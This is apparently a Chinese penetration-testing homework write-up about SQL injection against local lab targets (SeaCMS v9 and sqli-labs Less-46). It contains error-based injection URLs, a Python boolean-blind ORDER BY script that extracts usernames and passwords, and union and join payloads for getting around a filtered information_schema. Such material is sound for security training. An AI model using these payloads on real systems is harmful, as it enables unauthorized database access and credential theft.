渗透第二次作业

1、seacmsv9报错注入出管理员账号密码

注入漏洞的文件路径:seacmsv9.1\upload\comment\api\index.php

注入点:&$rlist

经源代码分析,可用以下语句注入,得到用户名:

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`

用以下语句注入出数据库名:

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20database()))),@`%27`

用以下语句注入出表名:

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),@`%27`

结果注入失败

2、orderby的布尔盲注

布尔盲注:

bash 复制代码
import requests
from lxml import html


def get_id_one(URL, paload):
    res = requests.get(url=URL, params=paload)
    tree = html.fromstring(res.content)
    id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()
    return id_one

# 获取数据库名
def database(URL):
    dataname = ""
    for i in range(1, 10):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            if id_one == "1":
                hight = mid
                mid = (low + hight) // 2
            else:
                low = mid + 1
                mid = (low + hight) // 2
        dataname += chr(mid)
    print(dataname)


# 获取表名
def table_name(URL):
    tables = ""
    for i in range(1, 40):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        tables += chr(mid)
    print(tables)


# 获取字段名
def column_name(URL):
    columns = ""
    for i in range(1, 25):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        columns += chr(mid)
    print(columns)


# 获取数据
def datas(URl):
    data = ""
    for i in range(1, 50):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        data += chr(mid)
    print(data)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-46/index.php"
    database(URL)
    table_name(URL)
    column_name(URL)
    datas(URL)

结果:

3、过滤information_schema,如何解决
bash 复制代码
如果information_schema被过滤掉了,该如何查询数据

方法一:利用sys数据库

查看所有数据库名:
SELECT DISTINCT table_schema FROM sys.schema_table_statistics;

查看数据库中所有表名:
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema = 'seacms';


#sys.schema_auto_increment_columns 
#sys.schema_table_statistics_with_buffer
#mysql.innodb_table_stats
#mysql.innodb_table_index
#均可代替 information_schema


方法二:无列名注入

利用 join-using 注列名

获取表名:
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+

获取字段名:
?id=-1' union select * from (select * from users as a join users as b)as c--+
?id=-1' union select * from (select * from users as a join users b using(id,username))c--+
?id=-1' union select * from (select * from users as a join users b using(id,username,password))c--+
相关推荐
代码改变世界ctw7 分钟前
1.4 ARM安全参考架构(PSA Certified)
arm开发·安全·arm·trustzone·atf·optee·安全启动
网安小白的进阶之路6 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-2
网络·安全·web安全·系统安全·交换机
安全系统学习6 小时前
网络安全之RCE分析与利用详情
服务器·网络·安全·web安全·系统安全
武汉唯众智创6 小时前
网络安全实训室建设方案全攻略
网络·安全·web安全·网络安全·网络安全实训室·网络安全实验室
weixin_472339466 小时前
网络安全攻防:文件上传漏洞的深度解析与防御实践
安全·web安全
雪兽软件6 小时前
2025 年网络安全与人工智能发展趋势
人工智能·安全·web安全
小黄人20257 小时前
自动驾驶安全技术的演进与NVIDIA的创新实践
人工智能·安全·自动驾驶
CS创新实验室7 小时前
筑牢 AIGC 安全防线:警惕提示词注入攻击
安全·大模型·aigc·提示词·提示词注入
宝山哥哥8 小时前
网络信息安全学习笔记1----------网络信息安全概述
网络·笔记·学习·安全·网络安全
电池保护板测试仪厂家10 小时前
电池充放电容量检测:守护电动出行设备动力核心的安全防线
科技·安全·能源·制造·零售·交通物流